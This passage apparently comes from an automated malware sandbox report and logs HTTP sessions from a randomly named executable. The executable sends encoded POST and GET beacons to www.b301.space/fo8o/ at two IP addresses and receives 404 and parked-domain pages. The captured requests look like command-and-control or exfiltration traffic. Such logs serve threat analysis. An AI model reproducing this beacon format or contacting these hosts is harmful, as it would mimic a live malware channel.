            Data Raw: 62 6c 57 64 3d 4e 57 66 33 62 5a 52 6f 59 45 75 4a 37 70 55 4e 41 44 38 34 4b 70 64 35 32 47 7a 54 71 76 67 75 33 31 66 65 75 62 46 52 76 45 65 4f 41 68 4a 4b 75 79 37 2b 30 31 4f 33 37 41 38 46 68 74 6e 4d 6d 46 50 4d 2f 50 67 57 47 55 78 53 31 55 38 76 46 65 6d 61 61 78 6b 73 37 6b 63 48 73 4f 78 57 62 70 49 79 4c 6a 35 38 48 72 2b 75 4e 6a 51 67 77 6b 44 6e 63 39 44 44 6e 46 73 59 75 2f 4e 47 4e 2b 50 75 56 33 4c 54 79 6e 71 66 47 38 76 42 63 31 56 5a 6b 5a 48 4c 62 66 45 30 36 48 42 56 48 66 47 69 5a 59 39 45 32 42 6a 36 62 51 49 6f 4b 77 78 32 41 68 4a 37 72 38 49 65 36 30 39 4d 37 32 6b 6f 47 57 63 2b 6d 7a 79 4d
            Data Ascii: blWd=NWf3bZRoYEuJ7pUNAD84Kpd52GzTqvgu31feubFRvEeOAhJKuy7+01O37A8FhtnMmFPM/PgWGUxS1U8vFemaaxks7kcHsOxWbpIyLj58Hr+uNjQgwkDnc9DDnFsYu/NGN+PuV3LTynqfG8vBc1VZkZHLbfE06HBVHfGiZY9E2Bj6bQIoKwx2AhJ7r8Ie609M72koGWc+mzyM
            Aug 2, 2024 13:54:10.844825983 CEST1236INHTTP/1.1 404 Not Found
            Server: nginx
            Date: Fri, 02 Aug 2024 11:54:10 GMT
            Content-Type: text/html
            Transfer-Encoding: chunked
            Connection: close
            Content-Encoding: gzip
            Data Raw: 63 62 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 0d 96 94 48 a4 ed c6 6d 63 4b 32 d2 97 0d 03 fa 86 35 dd 30 38 29 71 45 5d 49 8c 29 5e 96 a4 6c 6b b1 81 b8 59 d7 0d cd 50 14 18 30 60 18 da 75 c3 be bb 69 dc ba 79 fd 0b d4 3f da 73 ee 25 25 92 92 63 a7 76 b1 29 b0 22 5e 9e 7b ee b9 e7 e5 39 87 e7 b2 71 b1 23 ed 68 e4 0b d6 8f 06 6e ab 41 df cc e5 5e af 59 12 5e 89 d9 2e 0f c3 66 c9 09 2d de e1 7e e4 6c 89 12 eb f0 88 d7 7d de 13 75 9a d7 2c f9 3c d8 74 bc 5e dd 0e c4 76 09 1c 04 ef b4 1a 03 11 71 66 f7 79 10 8a a8 59 fa e0 fa 2f ea af e2 9e 1a f5 f8 00 b3 02 d9 96 51 88 15 a4 17 09 0f 34 9e 74 bc 8e d8 39 91 aa 2b 5d 57 d2 42 cf 67 c6 03 bb 4f e2 26 74 7e 20 7d 11 44 a3 66 49 f6 56 43 27 12 16 89 91 59 7e 7b 7b db 68 bf b4 b8 64 84 3e b7 e7 4f 1b 06 6e 66 42 3f 8a fc 55 d3 cc cf 33 e7 ae e7 0c a0 ad d9 a9 23 39 0c 06 8e 27 8c 60 68 3a 66 a2 46 b3 e7 ca b6 95 5c 18 be d7 9b e5 d8 6d af 72 df b7 9c 4e 86 e5 f2 ab 8b 2b 57 96 af 2e af 5c 79 e5 e5 97 5f 59 49 27 69 5d 6f [TRUNCATED]
            Data Ascii: cbeZmo_qHmcK2508)qE]I)^lkYP0`uiy?s%%cv)"^{9q#hnA^Y^.f-~l}u,<t^vqfyY/Q4t9+]WBgO&t~ }DfIVC'Y~{{hd>OnfB?U3#9'`h:fF\mrN+W.\y_YI'i]o9bAv:Q[-xNp<D"'rE+z|'~?d06>?p1n=v_fpomh/607K)6KvB*5}e>mno9:go^3k;J]uIWiW5wG-Ro\~mya-(+$&=;rW[`^yuIIy4MltErz28[0#:aUrH#e+NWw"Z[<`6PZ|ieeJit#")Mbj#`&u'DVH+J:1gxs<Ki{S>T', |P`#[m&4]0+8VI%?b&5RBm0}sMw`eS pg),k;AV#127H}P`Q;CZ`YL)AHQ|XcO.?{=#^v@,ME>CrVvT|jJ< [TRUNCATED]
            Aug 2, 2024 13:54:10.844846964 CEST1236INData Raw: bf 17 16 81 f6 70 80 41 65 35 cb 9a b0 cb 5d eb e0 40 a2 76 25 b2 5e c1 8b 69 4f e4 c9 b6 1c 98 1d 49 ee 65 26 94 16 7c c3 91 1d 8b 23 62 46 03 39 0c d7 95 66 9a 79 2d 2c 0c a3 81 15 22 e1 da 62 de 1d 2d 61 53 ec f8 4e 20 3a 8a d8 e6 03 9f 3b 3d
            Data Ascii: pAe5]@v%^iOIe&|#bF9fy-,"b-aSN :;= g4LfBnE$bV)|^_HN@"+Op}*Si:/M=Nw2MeiDE"-~"t [-uGZ[4_=7(co6Khf
            Aug 2, 2024 13:54:10.844861031 CEST976INData Raw: 54 6f 73 9d 49 79 6e 62 30 f3 86 51 09 86 bb e1 70 17 51 fc 87 ea cf cd de ac a1 c8 4b 74 ab 4d 89 f7 5c 5f 2b a3 a9 08 9b 97 4f e3 6e 19 9e 27 39 5d 86 54 1b 5e 9d 2b 19 1d 27 f4 5d 3e 82 44 65 c7 83 70 78 be cc a9 34 ab 08 b2 54 a2 0e da 90 3e
            Data Ascii: TosIynb0QpQKtM\_+On'9]T^+']>Depx4T>`+(*eMnP/L2>|mtHLtM-fdDL6$Bk"-Az[:qO<t%*F$rp$KZ:zq;T3RWIx[X8r


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            50192.168.2.664520194.67.71.191805700C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            TimestampBytes transferredDirectionData
            Aug 2, 2024 13:54:12.646102905 CEST795OUTPOST /fo8o/ HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Accept-Encoding: gzip, deflate, br
            Host: www.b301.space
            Origin: http://www.b301.space
            Cache-Control: no-cache
            Connection: close
            Content-Type: application/x-www-form-urlencoded
            Content-Length: 233
            Referer: http://www.b301.space/fo8o/
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Data Raw: 62 6c 57 64 3d 4e 57 66 33 62 5a 52 6f 59 45 75 4a 36 4e 6f 4e 4d 41 6b 34 62 35 64 34 71 32 7a 54 67 50 67 71 33 31 62 65 75 65 6f 4d 73 79 4f 4f 4f 6b 74 4b 74 33 48 2b 31 31 4f 33 6a 77 38 4d 73 4e 6e 35 6d 46 44 75 2f 4b 59 57 47 53 64 53 31 57 30 76 46 70 79 56 62 68 6b 71 69 30 63 46 69 75 78 57 62 70 49 79 4c 6a 74 57 48 71 57 75 4d 58 55 67 77 47 72 6b 56 64 44 43 7a 56 73 59 71 2f 4e 43 4e 2b 50 59 56 31 2b 45 79 6c 53 66 47 39 66 42 63 67 30 50 74 5a 48 4a 52 2f 45 6c 35 45 70 52 42 76 53 6b 57 71 4a 46 33 44 57 66 54 47 4a 79 57 44 78 56 53 78 70 35 72 2b 51 73 36 55 39 6d 35 32 63 6f 55 42 51 5a 70 48 58 76 58 4a 54 67 69 58 51 78 6a 6f 71 30 65 31 6b 4f 34 57 38 42 75 77 3d 3d
            Data Ascii: blWd=NWf3bZRoYEuJ6NoNMAk4b5d4q2zTgPgq31beueoMsyOOOktKt3H+11O3jw8MsNn5mFDu/KYWGSdS1W0vFpyVbhkqi0cFiuxWbpIyLjtWHqWuMXUgwGrkVdDCzVsYq/NCN+PYV1+EylSfG9fBcg0PtZHJR/El5EpRBvSkWqJF3DWfTGJyWDxVSxp5r+Qs6U9m52coUBQZpHXvXJTgiXQxjoq0e1kO4W8Buw==
            Aug 2, 2024 13:54:13.348253965 CEST1236INHTTP/1.1 404 Not Found
            Server: nginx
            Date: Fri, 02 Aug 2024 11:54:13 GMT
            Content-Type: text/html
            Transfer-Encoding: chunked
            Connection: close
            Content-Encoding: gzip
            Data Raw: 63 62 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 0d 96 94 48 a4 ed c6 6d 63 4b 32 d2 97 0d 03 fa 86 35 dd 30 38 29 71 45 5d 49 8c 29 5e 96 a4 6c 6b b1 81 b8 59 d7 0d cd 50 14 18 30 60 18 da 75 c3 be bb 69 dc ba 79 fd 0b d4 3f da 73 ee 25 25 92 92 63 a7 76 b1 29 b0 22 5e 9e 7b ee b9 e7 e5 39 87 e7 b2 71 b1 23 ed 68 e4 0b d6 8f 06 6e ab 41 df cc e5 5e af 59 12 5e 89 d9 2e 0f c3 66 c9 09 2d de e1 7e e4 6c 89 12 eb f0 88 d7 7d de 13 75 9a d7 2c f9 3c d8 74 bc 5e dd 0e c4 76 09 1c 04 ef b4 1a 03 11 71 66 f7 79 10 8a a8 59 fa e0 fa 2f ea af e2 9e 1a f5 f8 00 b3 02 d9 96 51 88 15 a4 17 09 0f 34 9e 74 bc 8e d8 39 91 aa 2b 5d 57 d2 42 cf 67 c6 03 bb 4f e2 26 74 7e 20 7d 11 44 a3 66 49 f6 56 43 27 12 16 89 91 59 7e 7b 7b db 68 bf b4 b8 64 84 3e b7 e7 4f 1b 06 6e 66 42 3f 8a fc 55 d3 cc cf 33 e7 ae e7 0c a0 ad d9 a9 23 39 0c 06 8e 27 8c 60 68 3a 66 a2 46 b3 e7 ca b6 95 5c 18 be d7 9b e5 d8 6d af 72 df b7 9c 4e 86 e5 f2 ab 8b 2b 57 96 af 2e af 5c 79 e5 e5 97 5f 59 49 27 69 5d 6f [TRUNCATED]
            Data Ascii: cbeZmo_qHmcK2508)qE]I)^lkYP0`uiy?s%%cv)"^{9q#hnA^Y^.f-~l}u,<t^vqfyY/Q4t9+]WBgO&t~ }DfIVC'Y~{{hd>OnfB?U3#9'`h:fF\mrN+W.\y_YI'i]o9bAv:Q[-xNp<D"'rE+z|'~?d06>?p1n=v_fpomh/607K)6KvB*5}e>mno9:go^3k;J]uIWiW5wG-Ro\~mya-(+$&=;rW[`^yuIIy4MltErz28[0#:aUrH#e+NWw"Z[<`6PZ|ieeJit#")Mbj#`&u'DVH+J:1gxs<Ki{S>T', |P`#[m&4]0+8VI%?b&5RBm0}sMw`eS pg),k;AV#127H}P`Q;CZ`YL)AHQ|XcO.?{=#^v@,ME>CrVvT|jJ< [TRUNCATED]
            Aug 2, 2024 13:54:13.348283052 CEST1236INData Raw: bf 17 16 81 f6 70 80 41 65 35 cb 9a b0 cb 5d eb e0 40 a2 76 25 b2 5e c1 8b 69 4f e4 c9 b6 1c 98 1d 49 ee 65 26 94 16 7c c3 91 1d 8b 23 62 46 03 39 0c d7 95 66 9a 79 2d 2c 0c a3 81 15 22 e1 da 62 de 1d 2d 61 53 ec f8 4e 20 3a 8a d8 e6 03 9f 3b 3d
            Data Ascii: pAe5]@v%^iOIe&|#bF9fy-,"b-aSN :;= g4LfBnE$bV)|^_HN@"+Op}*Si:/M=Nw2MeiDE"-~"t [-uGZ[4_=7(co6Khf
            Aug 2, 2024 13:54:13.348309040 CEST976INData Raw: 54 6f 73 9d 49 79 6e 62 30 f3 86 51 09 86 bb e1 70 17 51 fc 87 ea cf cd de ac a1 c8 4b 74 ab 4d 89 f7 5c 5f 2b a3 a9 08 9b 97 4f e3 6e 19 9e 27 39 5d 86 54 1b 5e 9d 2b 19 1d 27 f4 5d 3e 82 44 65 c7 83 70 78 be cc a9 34 ab 08 b2 54 a2 0e da 90 3e
            Data Ascii: TosIynb0QpQKtM\_+On'9]T^+']>Depx4T>`+(*eMnP/L2>|mtHLtM-fdDL6$Bk"-Az[:qO<t%*F$rp$KZ:zq;T3RWIx[X8r


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            51192.168.2.664521194.67.71.191805700C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            TimestampBytes transferredDirectionData
            Aug 2, 2024 13:54:15.179466009 CEST1808OUTPOST /fo8o/ HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Accept-Encoding: gzip, deflate, br
            Host: www.b301.space
            Origin: http://www.b301.space
            Cache-Control: no-cache
            Connection: close
            Content-Type: application/x-www-form-urlencoded
            Content-Length: 1245
            Referer: http://www.b301.space/fo8o/
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Data Raw: 62 6c 57 64 3d 4e 57 66 33 62 5a 52 6f 59 45 75 4a 36 4e 6f 4e 4d 41 6b 34 62 35 64 34 71 32 7a 54 67 50 67 71 33 31 62 65 75 65 6f 4d 73 79 47 4f 4f 57 6c 4b 75 51 54 2b 76 31 4f 33 39 41 38 42 73 4e 6e 6b 6d 46 62 71 2f 4b 6b 6f 47 58 42 53 30 31 73 76 55 6f 79 56 52 68 6b 71 71 55 63 59 73 4f 78 6d 62 6f 6b 2b 4c 6a 39 57 48 71 57 75 4d 52 34 67 35 30 44 6b 54 64 44 44 6e 46 73 45 75 2f 4e 71 4e 2b 47 74 56 31 71 55 79 56 79 66 46 64 50 42 65 55 55 50 6d 5a 48 48 57 2f 46 34 35 45 30 50 42 75 2f 62 57 71 52 72 33 44 79 66 44 77 6f 49 47 79 67 4a 42 78 46 46 2f 4d 41 4e 31 43 70 51 31 33 30 79 59 51 49 6c 71 30 6a 43 62 66 4c 70 71 58 6c 76 6a 37 36 2f 61 41 74 36 38 6b 6c 6d 7a 72 64 76 57 42 64 47 35 6c 39 46 33 4a 44 4e 4e 41 42 66 69 31 6d 75 51 6a 66 32 2f 78 65 4a 6e 4c 48 46 47 33 39 43 61 43 76 49 70 2b 33 70 68 48 6a 74 47 2b 42 42 76 2f 68 2f 46 54 53 69 76 49 4c 68 49 43 53 6b 4c 43 38 31 64 67 75 30 6c 63 6d 41 31 49 78 62 79 6a 54 6b 47 73 42 71 39 31 6e 67 53 58 4a 41 6b 77 58 44 4e [TRUNCATED]
            Data Ascii: blWd=NWf3bZRoYEuJ6NoNMAk4b5d4q2zTgPgq31beueoMsyGOOWlKuQT+v1O39A8BsNnkmFbq/KkoGXBS01svUoyVRhkqqUcYsOxmbok+Lj9WHqWuMR4g50DkTdDDnFsEu/NqN+GtV1qUyVyfFdPBeUUPmZHHW/F45E0PBu/bWqRr3DyfDwoIGygJBxFF/MAN1CpQ130yYQIlq0jCbfLpqXlvj76/aAt68klmzrdvWBdG5l9F3JDNNABfi1muQjf2/xeJnLHFG39CaCvIp+3phHjtG+BBv/h/FTSivILhICSkLC81dgu0lcmA1IxbyjTkGsBq91ngSXJAkwXDNujAcP/u5ZYswgtA/60QJVKdLJG4Kk9Fhlwyai/uVPLl4ZFJmgC9ztEu0GO8F/sKmnfVppK97udBAhlp4zXcA3ypUqhL8xH/ETSuO9b7+/yaAuRGmqUke5CLWSjNrP0F7Y2s+GTi4a54QtqBDKLYzE9tgHFvrTDv/tyIYMkeWTXz2F/RkEzqlaGt3eCthNFoMe9Hir165I3H1Bgy+J4IaJQ8xhUPnaFeue5y3NkX3olr8JZZ5T89Epzm7xuF8a+SHdfLglbql8Lft/X/XTsm5RLmWI/+adcLvVgxmGJj5zlQG1P1+GQPLBDElUGSuFgkwRhSIlfmxJd8dLe5dvWlD2fO6ALCHTqjGhfk7ONMMDynIckWM4LBtQVJyy8X87LeGRgWUsl/PO0l//J2URKCAzSAJ5dkjh8bWR6vqMm0xao9MR0ol7ZcqJH+QyJY0uwJwZGVEqGxTgd084fDEJlFZGKttoSFDKqSzgG4T7vHe8ZyZrG4O0SHBrjKVTziBwecHPLJtDXv3ew+IDe9gbIZmI7w/pY9BO1KoB9Lix2hovPlmBSRzl3Tvky3BR5gxy4+ssxw9zirCPCmJAgdlM4ZmtWQHxFOc8yatskMAP1cfOu5rcysx0OEVftESttjuskYnRnZo4cpVJEMIdZFN6MIlOWgFU7zKiJHnAC [TRUNCATED]
            Aug 2, 2024 13:54:15.888492107 CEST1236INHTTP/1.1 404 Not Found
            Server: nginx
            Date: Fri, 02 Aug 2024 11:54:15 GMT
            Content-Type: text/html
            Transfer-Encoding: chunked
            Connection: close
            Content-Encoding: gzip
            Data Raw: 63 62 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 0d 96 94 48 a4 ed c6 6d 63 4b 32 d2 97 0d 03 fa 86 35 dd 30 38 29 71 45 5d 49 8c 29 5e 96 a4 6c 6b b1 81 b8 59 d7 0d cd 50 14 18 30 60 18 da 75 c3 be bb 69 dc ba 79 fd 0b d4 3f da 73 ee 25 25 92 92 63 a7 76 b1 29 b0 22 5e 9e 7b ee b9 e7 e5 39 87 e7 b2 71 b1 23 ed 68 e4 0b d6 8f 06 6e ab 41 df cc e5 5e af 59 12 5e 89 d9 2e 0f c3 66 c9 09 2d de e1 7e e4 6c 89 12 eb f0 88 d7 7d de 13 75 9a d7 2c f9 3c d8 74 bc 5e dd 0e c4 76 09 1c 04 ef b4 1a 03 11 71 66 f7 79 10 8a a8 59 fa e0 fa 2f ea af e2 9e 1a f5 f8 00 b3 02 d9 96 51 88 15 a4 17 09 0f 34 9e 74 bc 8e d8 39 91 aa 2b 5d 57 d2 42 cf 67 c6 03 bb 4f e2 26 74 7e 20 7d 11 44 a3 66 49 f6 56 43 27 12 16 89 91 59 7e 7b 7b db 68 bf b4 b8 64 84 3e b7 e7 4f 1b 06 6e 66 42 3f 8a fc 55 d3 cc cf 33 e7 ae e7 0c a0 ad d9 a9 23 39 0c 06 8e 27 8c 60 68 3a 66 a2 46 b3 e7 ca b6 95 5c 18 be d7 9b e5 d8 6d af 72 df b7 9c 4e 86 e5 f2 ab 8b 2b 57 96 af 2e af 5c 79 e5 e5 97 5f 59 49 27 69 5d 6f [TRUNCATED]
            Data Ascii: cbeZmo_qHmcK2508)qE]I)^lkYP0`uiy?s%%cv)"^{9q#hnA^Y^.f-~l}u,<t^vqfyY/Q4t9+]WBgO&t~ }DfIVC'Y~{{hd>OnfB?U3#9'`h:fF\mrN+W.\y_YI'i]o9bAv:Q[-xNp<D"'rE+z|'~?d06>?p1n=v_fpomh/607K)6KvB*5}e>mno9:go^3k;J]uIWiW5wG-Ro\~mya-(+$&=;rW[`^yuIIy4MltErz28[0#:aUrH#e+NWw"Z[<`6PZ|ieeJit#")Mbj#`&u'DVH+J:1gxs<Ki{S>T', |P`#[m&4]0+8VI%?b&5RBm0}sMw`eS pg),k;AV#127H}P`Q;CZ`YL)AHQ|XcO.?{=#^v@,ME>CrVvT|jJ< [TRUNCATED]
            Aug 2, 2024 13:54:15.888547897 CEST1236INData Raw: bf 17 16 81 f6 70 80 41 65 35 cb 9a b0 cb 5d eb e0 40 a2 76 25 b2 5e c1 8b 69 4f e4 c9 b6 1c 98 1d 49 ee 65 26 94 16 7c c3 91 1d 8b 23 62 46 03 39 0c d7 95 66 9a 79 2d 2c 0c a3 81 15 22 e1 da 62 de 1d 2d 61 53 ec f8 4e 20 3a 8a d8 e6 03 9f 3b 3d
            Data Ascii: pAe5]@v%^iOIe&|#bF9fy-,"b-aSN :;= g4LfBnE$bV)|^_HN@"+Op}*Si:/M=Nw2MeiDE"-~"t [-uGZ[4_=7(co6Khf
            Aug 2, 2024 13:54:15.888554096 CEST976INData Raw: 54 6f 73 9d 49 79 6e 62 30 f3 86 51 09 86 bb e1 70 17 51 fc 87 ea cf cd de ac a1 c8 4b 74 ab 4d 89 f7 5c 5f 2b a3 a9 08 9b 97 4f e3 6e 19 9e 27 39 5d 86 54 1b 5e 9d 2b 19 1d 27 f4 5d 3e 82 44 65 c7 83 70 78 be cc a9 34 ab 08 b2 54 a2 0e da 90 3e
            Data Ascii: TosIynb0QpQKtM\_+On'9]T^+']>Depx4T>`+(*eMnP/L2>|mtHLtM-fdDL6$Bk"-Az[:qO<t%*F$rp$KZ:zq;T3RWIx[X8r


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            52192.168.2.664522194.67.71.191805700C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            TimestampBytes transferredDirectionData
            Aug 2, 2024 13:54:17.711461067 CEST521OUTGET /fo8o/?blWd=AU3XYvZFaGSlytwuLg8MPaUQqx3yoZo+slWhncsJrkz7OmZN7i/xsh6l91syvPfChHr514cSZiYi12sQUpLBNWUGgXkiv5tYdsczWAt3YIqQCRozzWbYSNnfkFwi3fxcOtzIASs=&Ixe=Apq4tPPXNdTp2 HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Host: www.b301.space
            Connection: close
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Aug 2, 2024 13:54:18.417612076 CEST1236INHTTP/1.1 404 Not Found
            Server: nginx
            Date: Fri, 02 Aug 2024 11:54:18 GMT
            Content-Type: text/html
            Transfer-Encoding: chunked
            Connection: close
            Data Raw: 32 36 33 34 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 64 61 74 61 2d 70 61 67 65 2d 74 79 70 65 3d 22 70 61 72 6b 69 6e 67 2d 63 72 65 77 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 61 72 63 68 69 76 65 22 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 77 77 77 2e 62 33 30 31 2e 73 70 61 63 65 22 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 62 33 30 31 2e 73 70 [TRUNCATED]
            Data Ascii: 2634<!doctype html><html lang="en" class="is_adaptive" data-page-type="parking-crew"><head><meta charset="UTF-8"><meta name="robots" content="noindex"><meta name="robots" content="nofollow"><meta name="robots" content="noarchive"><meta property="og:site_name" content="www.b301.space"><meta property="og:url" content="http://www.b301.space/"><meta property="og:image" content="http://yourmine.ru/i/parking/glob_parking.png"><meta property="fb:app_id" content="280542925476675"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="parking" content="ape"><title> &nbsp;www.b301.space </title><link rel="stylesheet" media="all" href="/parking-crew.css"><style>body { background: #E5E5E5; }</style><link rel="icon" href="/favicon.ico" type="image/x-icon"><script>/*<![CDATA[*/window.trackScriptLoad = function(){};/*...*/</script><script onload="window.trackScriptLoad('/manifest.js')" onerror="window.trackScript [TRUNCATED]
            Aug 2, 2024 13:54:18.417706013 CEST1236INData Raw: 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74
            Data Ascii: pt onload="window.trackScriptLoad('/head-scripts.js')" onerror="window.trackScriptLoad('/head-scripts.js', 1)" src="/head-scripts.js" charset="utf-8"></script><script type="text/javascript">var cname = "035524"; var identifier = "";</s
            Aug 2, 2024 13:54:18.417717934 CEST1236INData Raw: 6d 3d 65 78 70 69 72 65 64 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 72 65 6e 65 77 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 52 65 6e 65 77 3c 2f 61 3e 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 72 65 67 2e 63
            Data Ascii: m=expired&utm_campaign=renew" target="_blank">Renew</a> <a href="https://www.reg.com/domain/new/rereg_details?dname=www.b301.space&utm_source=www.b301.space&utm_medium=expired&utm_campaign=expired" class="b-pcrew__button b-pcrew__button_type_g
            Aug 2, 2024 13:54:18.417776108 CEST1236INData Raw: 73 3d 22 62 2d 70 63 72 65 77 5f 5f 62 75 74 74 6f 6e 20 62 2d 70 63 72 65 77 5f 5f 62 75 74 74 6f 6e 5f 74 79 70 65 5f 67 68 6f 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 22 3e 4f 72 64 65
            Data Ascii: s="b-pcrew__button b-pcrew__button_type_ghost" target="_blank" rel="noopener">Order service</a></div></div><div class="b-pcrew-content__item b-pcrew-content__item_type_select" onclick="location.href='https://www.reg.com/buy/domains/?query=www.
            Aug 2, 2024 13:54:18.417787075 CEST1236INData Raw: 77 77 77 2e 62 33 30 31 2e 73 70 61 63 65 26 75 74 6d 5f 6d 65 64 69 75 6d 3d 65 78 70 69 72 65 64 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 22 3e d0 9e d0 bf d1 80 d0 b5 d0 b4 d0 b5 d0 bb d0 b5 d0 bd d0 b8 d0 b5 20 49 50 3c 2f 61 3e 20 3c 61 20 63
            Data Ascii: www.b301.space&utm_medium=expired&utm_campaign"> IP</a> <a class="b-parking-footer__link" href="https://www.reg.ru/web-tools/geoip?utm_source=www.b301.space&utm_medium=expired&utm_campaign">
            Aug 2, 2024 13:54:18.417799950 CEST1236INData Raw: 70 73 3a 2f 2f 77 77 77 2e 72 65 67 2e 72 75 2f 64 65 64 69 63 61 74 65 64 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 77 77 77 2e 62 33 30 31 2e 73 70 61 63 65 26 75 74 6d 5f 6d 65 64 69 75 6d 3d 65 78 70 69 72 65 64 26 75 74 6d 5f 63 61 6d 70 61 69
            Data Ascii: ps://www.reg.ru/dedicated/?utm_source=www.b301.space&utm_medium=expired&utm_campaign">Dedicated</a></div></div></div><div class="b-parking-footer__wrapper"><div class="b-parking-footer__partner"><span class="b-parking-footer__partner-text"><a
            Aug 2, 2024 13:54:18.417864084 CEST1236INData Raw: 72 65 66 20 2b 20 27 72 69 64 3d 27 20 2b 20 64 61 74 61 2e 72 65 66 5f 69 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 69 66 20 28 20 64 61 74 61 2e 64 6e 61 6d 65 2e 6d 61 74 63 68
            Data Ascii: ref + 'rid=' + data.ref_id; } } if ( data.dname.match(/\.(ru|su|)$/g) ) { var rereg_links = document.querySelectorAll('.rereg'); for ( var i = 0; i < rereg_links.length; i++) {
            Aug 2, 2024 13:54:18.417879105 CEST1236INData Raw: 61 74 63 68 28 20 2f 5e 70 75 6e 79 2f 20 29 20 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 74 65 78 74 20 3d 20 73 70 61 6e 73 5b 20 69 20 5d 5b 20 74 20 5d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65
            Data Ascii: atch( /^puny/ ) ) { var text = spans[ i ][ t ]; text = punycode.ToUnicode( text ); spans[ i ][ t ] = text; } else if ( spans[ i ].className.match( /^no-puny/ ) ) { spa
            Aug 2, 2024 13:54:18.417891979 CEST55INData Raw: 74 3e 3c 21 2d 2d 20 2f 59 61 6e 64 65 78 2e 4d 65 74 72 69 6b 61 20 63 6f 75 6e 74 65 72 20 2d 2d 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
            Data Ascii: t>... /Yandex.Metrika counter --></body></html>0


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            53192.168.2.664523154.215.72.110805700C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            TimestampBytes transferredDirectionData
            Aug 2, 2024 13:54:26.497638941 CEST525OUTGET /fo8o/?Ixe=Apq4tPPXNdTp2&blWd=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnyIi7V/S5J9AzlXPHqpluzE36hxZsh30r8poflPmNwlfmk35jvL8= HTTP/1.1
